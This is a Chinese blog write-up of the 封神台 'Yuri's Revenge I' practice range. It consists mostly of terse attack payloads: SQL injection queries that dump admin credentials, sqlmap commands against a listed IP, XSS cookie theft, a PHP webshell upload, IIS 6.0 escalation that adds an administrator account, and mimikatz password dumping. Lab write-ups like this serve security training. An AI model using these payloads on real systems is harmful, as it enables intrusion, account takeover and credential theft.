封神台 -尤里的复仇Ⅰ write up 夜车星繁的博客

        无意间知道了这个靶场,可作为复习用,就将它安排进了复习计划里,在此篇博客写下记录留作未来回顾用。因为有了点基础在此写下payload只保证自己可以看得懂。

第一章:为了女神小芳!

 

?id=1 and 1=1 ------ 显示正常
?id=1 and 1=2 ------ 不显示
?id=1 order by 2 ------查询了两列
?id=100 select 1,2 ------将id设为一个不存在的数,看显示位
?id=132321 union select 1,version() %23------看数据库版本
?id=132321 union select 1,database() %23---当前数据库名
#得到表名   ?id=132321 union select 1,group_concat(table_name) from 
information_schema.tables where table_schema=database() %23

#得字段名   ?id=132321 union select 1,group_concat(column_name) from information_schema.columns where table_name='admin' %23

#用户名 ?id=132321 union select 1,group_concat(username) from admin %23

#密码   ?id=132321 union select 1,group_concat(password) from admin %23

第二章:遇到阻难!绕过WAF过滤!

访问时,把地址栏的 " ?id=XXX" 去掉。

id=171 order by 10
id=1455541+union+select+1,2,3,4,5,6,7,8,9,10+from+admin (+号代替空格,不然会出错)

id=14551+union+select+1,username,password,4,5,6,7,8,9,10+from+admin

插件:modify headers

sqlmap:

sqlmap -u "http://120.203.13.75:8001/shownews.asp?" --cookie "id=171" --table --level 2

sqlmap -u "http://120.203.13.75:8001/shownews.asp?" --cookie "id=171" --column -T admin --level 2

sqlmap -u "http://120.203.13.75:8001/shownews.asp?" --cookie "id=171"  --dump  -T admin -C "username,password" --level 2

第三章:这个后台能识别登录者…

抓包修改host值与refer值(本人遇到浏览器x-frame-option拦截,此题暂置)

第四章:为了更多的权限!留言板!!

使用XSS平台从页面获取到cookie内容可看flag字段

第五章:进击!拿到Web最高权限!

上传php木马用菜刀连接回显IIS中间件相关信息(IIS 6.0);存在IIS解析漏洞

第六章:SYSTEM!POWER!

 iis6.exe "whoami"
 iis6.exe "net user punisher punisher /add"
 iis6.exe "net localgroup Administrators punisher /add"

第七章:GET THE PASS!

privilege::debuug ----提升权限
sekurlsa::logonPasswords----获取登陆用户密码

 

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值